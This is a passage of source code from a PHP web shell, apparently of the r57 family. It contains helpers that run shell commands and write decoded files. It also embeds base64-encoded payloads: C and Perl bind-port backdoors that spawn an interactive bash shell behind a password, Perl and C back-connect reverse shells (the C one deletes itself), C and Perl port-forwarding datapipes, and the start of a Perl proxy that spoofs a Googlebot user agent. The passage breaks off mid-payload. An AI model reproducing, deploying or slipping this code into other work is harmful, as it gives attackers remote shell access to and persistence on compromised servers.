3482 if($checked) $ret .= " checked";
3483
3484 return $ret.">";
3485
3486}
3487
3488function which($pr)
3489
3490{
3491
3492$path = '';
3493
3494$path = ex("which $pr");
3495
3496if(!empty($path)) { return $path; } else { return false; }
3497
3498}
3499
3500function ps($pr)
3501
3502{global $unix;
3503
3504$path = '';
3505
3506if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");}
3507
3508else{$path = ex("tasklist | findstr \"$pr\"");}
3509
3510if(!empty($path)) { return $path; } else { return false; }
3511
3512}
3513
3514function locate($pr)
3515
3516{
3517
3518$path = '';
3519
3520$path = ex("locate $pr");
3521
3522if(!empty($path)) { return $path; } else { return false; }
3523
3524}
3525
3526function cf($fname,$text)
3527
3528{
3529
3530 if(!morewrite($fname,@base64_decode($text))){err(0);};
3531
3532}
3533
3534function sr($l,$t1,$t2)
3535
3536 {
3537
3538 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
3539
3540 }
3541
3542if (!@function_exists("view_size"))
3543
3544{
3545
3546function view_size($size)
3547
3548{
3549
3550 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
3551
3552 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
3553
3554 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
3555
3556 else {$size = $size . " B";}
3557
3558 return $size;
3559
3560}
3561
3562}
3563
3564 function DirFilesR($dir,$types='')
3565
3566 {
3567
3568 $files = Array();
3569
3570 if(($handle = @opendir($dir)))
3571
3572 {
3573
3574 while (false !== ($file = @readdir($handle)))
3575
3576 {
3577
3578 if ($file != "." && $file != "..")
3579
3580 {
3581
3582 if(@is_dir($dir."/".$file))
3583
3584 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
3585
3586 else
3587
3588 {
3589
3590 $pos = @strrpos($file,".");
3591
3592 $ext = @substr($file,$pos,@strlen($file)-$pos);
3593
3594 if($types)
3595
3596 {
3597
3598 if(@in_array($ext,explode(';',$types)))
3599
3600 $files[] = $dir."/".$file;
3601
3602 }
3603
3604 else
3605
3606 $files[] = $dir."/".$file;
3607
3608 }
3609
3610 }
3611
3612 }
3613
3614 @closedir($handle);
3615
3616 }
3617
3618 return $files;
3619
3620 }
3621
3622 class SearchResult
3623
3624 {
3625
3626 var $text;
3627
3628 var $FilesToSearch;
3629
3630 var $ResultFiles;
3631
3632 var $FilesTotal;
3633
3634 var $MatchesCount;
3635
3636 var $FileMatschesCount;
3637
3638 var $TimeStart;
3639
3640 var $TimeTotal;
3641
3642 var $titles;
3643
3644 function SearchResult($dir,$text,$filter='')
3645
3646 {
3647
3648 $dirs = @explode(";",$dir);
3649
3650 $this->FilesToSearch = Array();
3651
3652 for($a=0;$a<count($dirs);$a++)
3653
3654 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
3655
3656 $this->text = $text;
3657
3658 $this->FilesTotal = @count($this->FilesToSearch);
3659
3660 $this->TimeStart = getmicrotime();
3661
3662 $this->MatchesCount = 0;
3663
3664 $this->ResultFiles = Array();
3665
3666 $this->FileMatchesCount = Array();
3667
3668 $this->titles = Array();
3669
3670 }
3671
3672 function GetFilesTotal() { return $this->FilesTotal; }
3673
3674 function GetTitles() { return $this->titles; }
3675
3676 function GetTimeTotal() { return $this->TimeTotal; }
3677
3678 function GetMatchesCount() { return $this->MatchesCount; }
3679
3680 function GetFileMatchesCount() { return $this->FileMatchesCount; }
3681
3682 function GetResultFiles() { return $this->ResultFiles; }
3683
3684 function SearchText($phrase=0,$case=0) {
3685
3686 $qq = @explode(' ',$this->text);
3687
3688 $delim = '|';
3689
3690 if($phrase)
3691
3692 foreach($qq as $k=>$v)
3693
3694 $qq[$k] = '\b'.$v.'\b';
3695
3696 $words = '('.@implode($delim,$qq).')';
3697
3698 $pattern = "/".$words."/";
3699
3700 if(!$case)
3701
3702 $pattern .= 'i';
3703
3704 foreach($this->FilesToSearch as $k=>$filename)
3705
3706 {
3707
3708 $this->FileMatchesCount[$filename] = 0;
3709
3710 $FileStrings = @file($filename) or @next;
3711
3712 for($a=0;$a<@count($FileStrings);$a++)
3713
3714 {
3715
3716 $count = 0;
3717
3718 $CurString = $FileStrings[$a];
3719
3720 $CurString = @Trim($CurString);
3721
3722 $CurString = @strip_tags($CurString);
3723
3724 $aa = '';
3725
3726 if(($count = @preg_match_all($pattern,$CurString,$aa)))
3727
3728 {
3729
3730 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
3731
3732 $this->ResultFiles[$filename][$a+1] = $CurString;
3733
3734 $this->MatchesCount += $count;
3735
3736 $this->FileMatchesCount[$filename] += $count;
3737
3738 }
3739
3740 }
3741
3742 }
3743
3744 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
3745
3746 }
3747
3748 }
3749
3750 function getmicrotime()
3751
3752 {
3753
3754 list($usec,$sec) = @explode(" ",@microtime());
3755
3756 return ((float)$usec + (float)$sec);
3757
3758 }
3759
3760$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
3761
3762A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
3763
3764GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
3765
3766b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
3767
3768pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
3769
3770NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
3771
3772ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
3773
3774ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
3775
37767DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
3777
37789tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
3779
37802ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
3781
3782dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
3783
3784lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
3785
3786$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
3787
3788VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
3789
3790JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
3791
3792TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
3793
3794lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
3795
3796Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
3797
3798Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
3799
3800lIENPTk47DQpleGl0IDA7DQp9DQp9";
3801
3802$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
3803
3804aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
3805
3806hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
3807
3808sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
3809
3810kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
3811
3812KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
3813
3814OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
3815
3816$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
3817
3818BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
3819
3820SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
3821
3822KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
3823
3824sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
3825
3826Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
3827
3828QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
3829
3830Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
3831
3832$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
3833
3834x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
3835
3836HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
3837
3838aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
3839
3840lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
3841
3842xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
3843
3844W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
3845
3846LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
3847
3848udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
3849
38500KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
3851
3852iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
3853
3854KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
3855
3856gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
3857
3858hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
3859
3860iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
3861
3862ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
3863
3864vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
3865
3866AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
3867
3868QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
3869
3870ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
3871
3872gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
3873
3874wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
3875
387629jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
3877
3878MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
3879
3880gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
3881
38825zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
3883
3884HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
3885
3886dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
3887
3888KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
3889
3890ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
3891
3892E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
3893
3894Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
3895
3896NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
3897
3898J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
3899
3900CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
3901
3902dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
3903
3904gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
3905
3906lsZSk7DQogIHJldHVybiAwOw0KfQ==";
3907
3908$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
3909
3910CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
3911
3912bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
3913
3914gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
3915
3916NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
3917
3918iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
3919
3920aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
3921
3922SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
3923
3924xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
3925
3926WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
3927
3928CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
3929
3930yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
3931
3932I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
3933
3934m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
3935
3936IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
3937
3938lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
3939
3940QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
3941
3942CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
3943
3944c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
3945
3946NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
3947
3948UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
3949
3950DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
3951
3952ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
3953
39541ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
3955
3956$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
3957
3958luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
3959
39600NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
3961
3962UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
3963
3964DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
3965
3966AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
3967
3968GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
3969
3970cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
3971
3972BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
3973
3974AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
3975
3976TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
3977
3978eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
3979
3980oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
